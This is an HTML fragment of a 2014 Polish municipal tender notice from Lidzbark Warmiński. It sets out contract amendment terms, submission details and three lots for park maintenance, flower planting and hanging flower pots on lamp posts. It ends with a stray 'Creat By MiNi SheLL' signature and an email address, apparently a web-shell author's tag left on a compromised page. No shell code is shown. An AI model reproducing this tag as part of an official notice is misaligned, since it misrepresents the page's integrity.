<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w treści umowy w stosunku do treści oferty mogą być dokonane na skutek 
zaistnienia okoliczności niemożliwych wcześniej do przewidzenia, niezależnych od woli stron, a w szczególności:
1) wystąpienie siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie                 
     z SIWZ,
2) okoliczności niezależne od stron uniemożliwiające realizację przedmiotu umowy 
    w terminie, a w szczególności wystąpienie klęski żywiołowej.
2. Zmiany umowy mogą także obejmować:
   1) pominięcie jakiejkolwiek części usługi lub dostawy (jednak bez prawa zlecenia jej 
       osobom trzecim),
   2) zmiany w kolejności i terminach wykonywania usług lub dostaw,
   3) inne zmiany nie wymienione wyżej, które obniżą koszty realizacji umowy lub w inny 
      sposób są korzystne dla  Zamawiającego.
3. Zmiana umowy może również nastąpić:
   1) W przypadku nie wykonania części  lub całości przedmiotu umowy z powodu tego, że 
       wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć 
       w chwili zawarcia umowy, wysokość wynagrodzenia Wykonawcy zostanie zmniejszona 
       o wartość usług lub dostaw niewykonanych,
   2) w przypadku usług lub dostaw pominiętych - cena umowy zostanie zmniejszona                           
      o wartość usług lub dostaw niewykonanych,
  3) W przypadku zmian upoważnionych przedstawicieli stron,
  4) W przypadku zmiany osób reprezentujących strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://lidzbarkw-um.bip-wm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 206.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2014 godzina 12:05, miejsce: Urząd Miejski w Lidzbarku Warmińskim, 11-100 Lidzbark Warmiński, ul. A. Świętochowskiego 14, pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Pielęgnacja terenów zieleni miejskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Systematyczne koszenie trawników i skarp,
      2) Grabienie trawników - wiosenne i jesienne, 
      3) Zakładanie trawników z siewu, 
      4) Zakładanie trawników z rolki, 
      5) Pielęgnacja żywopłotów, 
      6) Całoroczna pielęgnacja krzewów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.41.00-5, 77.34.20.00-9, 77.31.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Dostawy, sadzenie i pielęgnacja roślin ozdobnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Dostawa, sadzenie i pielęgnacja kwiatów (jednorocznych i wieloletnich), 
      2) Dostawa, sadzenie i pielęgnacja krzewów ozdobnych,
      3) Przesadzanie roślin wieloletnich wraz z ich pielęgnacją po przesadzeniu do 
          końca okresu wegetacyjnego (krzewów, róż),
      4) Przygotowanie gruntu pod nasadzenia krzewów ozdobnych,
      5) Ściółkowanie terenu korą sosnową, 
      6) Wykonanie drewnianego zabezpieczenia przy nasadzeniach wieloletnich (krzewach, 
          bylinach itp.) i jego konserwacja,
      7) Montaż konstrukcji wiszących, 
      8) Całosezonowa pielęgnacja roślin w wiszących konstrukcjach kwiatowych 
          zamontowanych na słupach oświetleniowych, będących w posiadaniu Zamawiającego 
          oraz demontaż ww. konstrukcji po zakończeniu okresu wegetacyjnego,
      9) Przygotowanie do nowego okresu wegetacyjnego wież kwiatowych,
      10) Pielęgnacja kwiatów (róż, bylin, roślin cebulowych).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.12.11.00-6, 77.31.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3  - Dostawa i montaż wiszących donic i konstrukcji kwiatowych  
       wraz z ich ukwieceniem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Dostawa 30 kompletów wiszących donic kwiatowych wraz z ich ukwieceniem oraz 
           montaż ww. donic na słupach oświetleniowych,
       2) Dostawa 7 kompletów wiszących kaskadowych konstrukcji kwiatowych wraz z ich 
           ukwieceniem oraz montaż ww. konstrukcji na słupach oświetleniowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.83.00-0, 03.12.11.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com